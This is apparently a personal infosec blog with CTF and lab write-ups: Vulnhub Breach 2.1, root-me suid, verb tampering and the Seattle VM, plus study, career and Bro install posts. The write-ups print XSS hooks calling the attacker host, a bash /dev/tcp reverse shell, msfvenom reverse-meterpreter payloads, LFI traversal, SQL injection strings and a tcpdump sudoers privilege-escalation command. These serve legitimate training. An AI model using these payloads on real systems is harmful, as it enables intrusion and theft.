Saturday, September 10, 2016

Vulnhub Breach 2.1 walkthrough

Breach has a static IP address of 192.168.110.151. After changing my Kali vm IP address to the same subnet as Breach using the command "ifconfig eth0 address 192.168.110.150", I kicked off an nmap scan.


I was expecting to see ports 80 or 443 open. All that's really left here is ssh on port 65535. I ssh to it and see the following banner:


Since there wasn't any "source" available as there weren't any http/https ports open, I tried "inthesource" as the password and access was denied. Next I tried specifying "peter" as login and "inthesource" as password, and it looked like I was logged in then immediately disconnected. On a hunch I ran another nmap scan and found port 80 was now open.



Reading the source of the web page I find the following hint:


Remembering the ssh banner that mentions "stop checking your blog all day" I checked for a URL of /blog and found it.


Before attacking the blog I checked for a robots.txt file in the web root but didn't find one. Usually I would run dirb or dirbuster to discover hidden content. I've been looking forward to trying a new tool, dirsearch. Unfortunately no other web directories were discovered.


I searched exploit-db.com for BlogPHP exploits and found a persistent XSS in the new user registration field at https://www.exploit-db.com/exploits/17640/. I started up BeEF and registered a new user with a username of "<script type=text/javascript src=http://192.168.110.150:3000/hook.js></script>" and waited a few minutes for it to show up in the BeEF console. BeEF tells us that the victim is using Firefox v15 which is vulnerable to the Metasploit firefox_proto_crmfrequest exploit. We can also steal the admin's cookie which exposes the admin password md5 hash, which was easily cracked on crackstation.net and is "admin123".






Unfortunately I was unable to login using those credentials. I also tried to masquerade as the admin user after sending the request to Burp Repeater and changing my cookie to admin's stolen cookie.

Next I tested the HTTP headers for XSS and SQLi and found a blind SQL injection in the Referer field. Using the original Referer in each request the page would load in under a second. When inserting '+(select*from(select(sleep(20)))a)+' the page would take 20 seconds to load. In the request below I used a value of 20000 thinking that sleep() used milliseconds.


Sensing that the Referer header may be responsible for unsuccessful use of the admin cookie, I sent the original request to Burp Repeater and changed the referrer URL to use 127.0.0.1. No joy.

I sent the response to sqlmap "sqlmap -r req.txt --level=5 --risk=3" and confirmed SQL injection. Unfortunately I was unable to gain a foothold with it because sqlmap was unable to obtain the root user db password hash, and there weren't any writable locations for sqlmap to drop a shell.


Let's enumerate the database and see what secrets it holds.



The password for admin is "32admin".


Now I'm going back to hooking the user with the XSS and Firefox exploits after getting distracted by the SQL injection vulnerability.

I configured Metasploit for the firefox_proto_crmfrequest exploit and created a new user with a username of "<iframe src="http://192.168.110.150:8888/WqmmCs1DdtQtjh"></iframe>".

A few minutes later:



Now let's get a more stable shell. My attempts to get a bash reverse shell with "bash -i >& /dev/tcp/192.168.110.150/9999 0>&1" fail. So let's find out why we get disconnected immediately after ssh login: "cat /etc/ssh/sshd_config".


It looks like whatever is in "/usr/bin/startme" is kicking us off. I create a Metasploit meterpreter reverse shell binary with msfvenom and serve it up using python SimpleHTTPServer.


I wait for the Firefox exploit to hook Peter again and I download and execute it to get a meterpreter shell.


Our stable meterpreter shell:


Processes:


What's running on 127.0.0.1:2323?


Those look like GPS coordinates. I search Google and find those are the coordinates for Houston, TX. Other users of the system include blumbergh and milton, so I try those usernames with a password of "Houston". Username/password of milton:Houston gets me in. Another hint for "stapler". Let's see if we can find one.


Let's checkout the source of /usr/local/bin/cd.py.


So "mine" is the answer to the question. Let's telnet to port 2323 again and enter "mine".


Now we're logged in as user milton. Let's do some more enumeration. The first thing I check is if milton has sudo rights: "sudo -l". Nope. Nothing interesting in milton's .bash_history file. I checked for suid files with "find / -perm -4000 -type f 2>/dev/null" and come up emtpy. I check for any new open ports and find port 8888 is now open to the outside.



I attempted to login as admin:32admin, the credentials that I dumped earlier from the SQLi, but they didn't work. I checked exploit-db.com for an exploit for OSCommerce v3.0 Alpha 5 and find https://www.exploit-db.com/exploits/33913/, a Local File Include vulnerability. I created a php reverse meterpreter to upload with the command "msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.150 LPORT=10000 -e php/base64 > phprevshell.php". I edited it to add "<?php " to the beginning and " ?>" to the end. I uploaded it to /tmp using my shell as user milton, "chmod +x phprevshell.php", and execute it on oscommerce by visiting the URL "http://192.168.110.151:8888/oscommerce/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../../../../../tmp/phprevshell".


The end (root) is in sight! I've seen the use of sudo to run tcpdump before and blogged about it here: http://www.stevencampbell.info/2016/04/why-sudo-tcpdump-is-dangerous.html. I enter "echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/.test && chmod +x /tmp/.test'" and run tcpdump with "sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root".


The flag:


Thank you mrb3n for Breach 2.1. It was a lot of fun and very challenging. 

Thank you g0tmi1k for vulnhub.com. Vulnhub has been an excellent resource for preparing for PWK/OSCP and I continue to learn from the exercises. After earning my OSCP certification I missed the challenge and exhilaration that I felt in the PWK labs, and Vulnhub has helped me to relive that.

Friday, September 9, 2016

Kali Configure BeEF for Metasploit Integration

This works on Kali version 2016.2.

Edit /usr/share/beef-xss/config.yaml line 156 and change false to true. Edit /usr/share/beef-xss/extensions/metasploit/config.yaml and change host and callback_host from 127.0.0.1 to your IP address. Restart BeEF by entering the command "service beef-xss restart". Start Metsploit and at the msf> prompt enter "load msgrpc ServerHost=<IP address> Pass=abc123", using your IP address.

Wednesday, August 17, 2016

Hacking the Learning Process

Working in information security sometimes feels like drinking from the ocean through a fire hose. The more I learn, the more I feel like a newb and realize that I've only found the tip of the iceberg. It takes a lot of passion for the subject to keep studying and doing hands-on labs day after day without burning out.

The idea for this post came to me when I recently answered a Reddit post asking about how we learn about security. There's so much to learn that many people don't know where to start because it can be overwhelming. In my case I have a hard time staying on track once I start learning something because I keep finding another thread to pull and start unraveling the fabric of a related subject.

I'm going to share what's worked for me over the years that I've served in the military and worked in IT. Over 20 years ago I was an Undesignated Airman in the Navy, meaning I didn't have a formal training school for a rating (or MOS in other branches). In order to take the test for Aviation Electrician I had to digest a stack of books called the Navy Electrical and Electronic Training Series (NEETS) that was about a foot tall. Through the years I had to study an even larger stack of manuals to be advanced in rank. After the Navy, the study habits that I am going to outline here helped me to earn various IT and security certifications including OSCP, OSWP, CCNA, CCA, and Security+.

Start with a written plan. In the case of information security, there are so many things to learn that it's easy to feel overwhelmed. Think about your knowledge and skills gaps and write down your plan of study. If you're working on a certification, decide how long you think it will take to cover each section of the study guide and set an exam date. Book the exam right away. The sense of impending doom will help you to stay on track. If something comes up that delays taking the exam you can usually cancel or reschedule if you contact the testing center in advance.

While studying, find a quiet place where you can read out loud without bothering anyone. I've found that reading out loud leads to better memory retention, most likely because of the increase in neural connections required to speak it vs. only think it.

For memorization write out flash cards. Again, the extra step of writing it down seems to lead to better memory retention vs. only reading it silently. As you flip through the stack of flash cards, remove any cards from the stack that you can easily answer. This leave the more difficult cards that will be reviewed more often. Repeat the process of reviewing the stack, removing cards that you can easily answer until you have removed every card. Then repeat the process by reviewing the whole stack again.

For hands-on learning, write a lesson plan as if you're going to teach the subject to a complete beginner. Create a PowerPoint presentation with screenshots as well as any commands that need to be run to use for the next step. Finally, install screen cast software and record your screen and voice while giving your presentation. While you review the video it will be easy to spot where you had problems or things went awry. Work through the issues to refine your presentation and then create a new screen cast. When I'm working in VMware doing security labs to learn new things I like to put screenshots and commands to run in Microsoft OneNote and use those notes on a second screen to work through my screen casts. If you work in a role that presents to customers or groups, a screen cast or web cast can help you to refine your speech and visual presentation. Recording screen casts is something I've only recently starting doing in order to prepare presentations for a local security meetup group.

What are your tips to hack the learning process?


Thursday, July 14, 2016

How to break into information security

I'm including an email reply I just sent to another grad from ECPI, my alma mater. Please note that a degree isn't a requirement to get into infosec. The person who emailed me is a recent college grad.

It's not easy getting directly into an IT security job after college without having related experience. The two most common routes to security that I see are experienced developers or experienced system administrators. The reason is because it helps to be an experienced developer to be able to spot code flaws, or to have experience in how systems are supposed to be configured in order to spot vulnerabilities due to mis-configurations.

My recommendations:

Get the Security+ certification if you don't already have it. My security team at CHKD has a desktop support tech that moved onto the team only after getting Security+ certified. Also there are many DoD/Contractor jobs in this area and they require a minimum of Security+ to get hired.

I recommend getting a job as a systems administrator and making it known to your employer that you are interested in security so that if there are any related tasks you can take on or lateral movement onto a security team is available then they'll think of you. Once you have documented job experience on your resume related to security then it will be easier to move into security. Last year when I started applying for security jobs I had a LOT of general IT experience, but I listed all of the security related stuff on my resume and left off everything else. Working as a system administrator you'll most likely get job experience working with firewalls and other security technology that you can put on your resume that will help you when you apply for security jobs. If you can't get into a security job right away, keep pushing towards security in whatever IT job you can get.

Decide on what specifically you want to do in IT security. The network security field has a lot of specialties. Check out Lesley Carhart's blog posts on "Starting an Infosec Career". My reasoning is that there are different paths and certifications depending on what you want to do. Her blog posts talk about what each job is like and how the people quoted in the article got into those jobs.
https://tisiphone.net/2015/10/12/starting-an-infosec-career-the-megamix-chapters-1-3/
https://tisiphone.net/2015/11/08/starting-an-infosec-career-the-megamix-chapters-4-5/

Other things you can do that will show enthusiasm to prospective employers:

  • Start a blog about security.
  • Join a security related meetup group. I run one (757 White Hat Hackers) and I attend meetups at another local security group. Both groups have people in attendance that are trying to break into security. Our meetings are a great way to meet others, ask questions, and network.
  • Use virtualization software like VMware Workstation Player or VirtualBox (both are free) and do security related labs in your spare time and blog about it. My VMware lab has a virtual firewall (pfsense) and various Windows and Linux servers that are vulnerable to various exploits and I use it to practice a lot in my spare time.
  • In your virtual lab, download vulnerable virtual machines from vulnhub.com and work on hacking them. Blog about them and post your walkthrough's and include how to secure the same systems that you hacked (legally in your virtual lab of course). If you work on vulnhub.com virtual machines and don't know what to do with them, read other people's walkthroughs until you get the idea.

Go to security conferences, like the smaller regional BSides conferences and volunteer ahead of time. You'll meet a lot of people in infosec that way and they encourage volunteers and one of those people you meet may give you a break. If you're a volunteer you usually get in for free.

If you want to get into penetration testing, look into Offensive Security's Pentesting with Kali course and the certification, OSCP. I earned the OSCP and OSWP certs last year before I got my current job. Even though this job wanted someone with a CISSP cert, which I don't have, they were impressed with my OSCP cert and it helped. Even if you don't have job experience, if you have OSCP cert then that proves that you can "hack it" because there's no question and answer multiple choice test. It's all hands on hacking in a lab environment. There are companies that hire people to be penetration testers without experience if you have OSCP cert, but be prepared to relocate for those jobs. After you have enough experience in pentesting you can usually work remotely from anywhere, but as a newb they will want you to work onsite.

Learn how to write code and how to break it. If you can discover and publish a CVE in your name it could make you famous in the industry.

Get a github account and start publishing code and you can also contribute to other people's open source projects. I've published some Python scripts on my github account, some of it related to security, and I've also contributed to other people's code. Python is a good place to start as most infosec jobs will expect you to be able to write Python and PowerShell code.

Get involved in CTF's, Capture the Flag events where you hack into vulnerable systems as well as defend your own sytem during CTF challenges. You can do them remotely from home as well as attend CTF's at security conferences.

All of those things I've mentioned above are what employers look for in a candidate because it's not just about what you know or have done, it's also about showing enthusiasm and drive.

Check out infosec forums on Reddit, but make sure you search other posts and read the sidebar guidelines before you ask questions. People get a little harsh when you ask the same questions that hundreds of others have already asked and you didn't bother to search and read first.
https://www.reddit.com/r/AskNetsec/
https://www.reddit.com/r/netsecstudents/
https://www.reddit.com/r/netsec/

Best of luck and feel free to stay in touch and ask questions.

Steve

Wednesday, May 18, 2016

HTTP Verb Tampering

Here I have a static web page. I viewed the source and there aren't any comments, Javascript, forms, or other exploitable features on the page.


I ran Dirbuster to discover additional unlinked content and found the directory /admin.


The Burp Suite Pro proxy history shows that the page is using Basic authentication.

I attempted to brute force the login but the password wasn't found. Next I used Nmap to test for HTTP verb tampering.



Next I went back to Burp Suite, intercepted the request and changed the GET verb to GGG and was able to bypass authentication and retrieve the challenge password.


The GET method is one of many HTTP verbs, including POST GET PUT DELETE SPACEJUMP DEBUG OPTIONS TRACE CONNECT PROPFIND LOCK UNLOCK PROPPATCH MKCOL COPY MOVE.

Here is a sample .htaccess file in which the author only limited the GET verb, which I was able to easily bypass.

AuthName “restrict access”
AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
< Limit GET POST >
require group staff
< /Limit >

Additionally you could put all HTTP verbs in the file:

AuthName “restrict all methods”
AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
< Limit > POST GET PUT DELETE SPACEJUMP DEBUG OPTIONS TRACE CONNECT PROPFIND LOCK UNLOCK PROPPATCH MKCOL COPY MOVE>
require group staff
< /Limit >

However, you noticed that I was able to use Burp to tamper with the request and the server treated the unknown "GGG" as a GET request and allowed me to bypass authentication.

A safe alternative to prevent verb tampering is to remove all method limits which would require authentication for any methods which would catch anything you throw at it.

AuthName “restrict all methods except”
AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
require group staff

Friday, May 6, 2016

Exploiting suid binary on Root-me.org ELF32 - System 1

Once logged in, I issued the "ls -l" command and find the binary "ch11" as well as the source code file. Notice the permissions of ch11 is suid root and our user account doesn't have permissions to view the contents of the .passwd file which contains the flag. Even without the source code file, we can use the "strings" command to find enough of a clue to solve this challenge without a debugger. Notice the "ls /challenge/app-script/ch11/.passwd" where the .passwd file contains the flag.




I execute the ch11 binary:



Since the binary is suid, whatever command it executes runs as the file owner instead of our user.

I copied the /bin/cat command to /tmp/ls and export my path to /tmp and run the ch11 binary again. This time it executes the cat command from the /tmp/ls command and outputs the flag in the ".passwd" file!






Friday, April 22, 2016

Installing Bro Network Security Monitor

This is the first of a two part series. In part two I'll be demonstrating how to use Bro as well as use cases.

Installation:

This installation was done on Debian. Use the appropriate package manager for your Linux distribution to install the following packages.

sudo apt-get install cmake make gcc g++ flex bison libpcap-dev libssl-dev python-dev swig zlib1g-dev

sudo apt-get install libgeoip-dev

wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
gunzip GeoLiteCity.dat.gz


sudo mv /home/<username>/GeoLiteCity.dat /usr/share/GeoIP/GeoIPCity.dat

wget https://www.bro.org/downloads/release/bro-2.4.1.tar.gz

tar zxvf bro-2.4.1.tar.gz

cd bro-2.4.1

sudo ./configure --prefix=/opt/bro2

make

make install

export PATH=/opt/bro2/bin:$PATH

nano ~/.profile
    PATH=/opt/bro2/bin:$PATH



  • In /opt/bro2/etc/node.cfg, set the right interface to monitor.
  • In /opt/bro2/etc/networks.cfg, comment out the default settings and add the networks that Bro will consider local to the monitored environment.
  • In /opt/bro2/etc/broctl.cfg, change the MailTo email address to a desired recipient and the LogRotationInterval to a desired log archival frequency.


broctl

install

start

stop

Usage:


bro -C -r pcap.pcap

Stay tuned for more Bro goodness!

Saturday, April 16, 2016

Web application pentesting on Seattle vm

In my spare time I like to sharpen my skills by pentesting vulnerable virtual machines, usually from vulnhub.com. This is my review of "Seattle". This wasn't a thorough pentest of the web application, it was what I was able to knock out in a couple of hours one afternoon for fun.

I found an LFI at the URL "/details.php?prod=1&type=1&lang=USD".


The "My Account" page is vulnerable to SQL injection. The email address must be a valid email address. It wouldn't accept foo@foo.com.


On the Blog page, I clicked on "Admin" and arrived at this page which includes admin's email address.


Back on the "My Account" page, I logged in with admin@seattlesounds.net and a password of "' or 1=1 -- ".

After multiple tests, I was able to exploit stored XSS on the site with "<a onmouseover=alert(document.cookie)>xxs link</a>". Any requests containing SCRIPT were filtered on the blog form. OWASP has an excellent cheat sheet on XSS filter evasion at https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.


I was able to use sqlmap to exploit SQL injection with any of the product pages, using URL "/details.php?prod=1" for example. This was a blind SQL injection vulnerability, meaning that my usual methods of manually pulling info from the database to be displayed on the page didn't work, so I let sqlmap do the heavy lifting as blind SQL injection can be very difficult to exploit.

 

I pasted the hash into crackstation.net and found the root password. Had it not been found on crackstation I would have run it through oclhashcat which uses the GPU to run through very large password lists in a few minutes.

Game over:

 

This wasn't the most difficult web app that I've worked through. It did provide a couple of hours of fun on an afternoon off from work.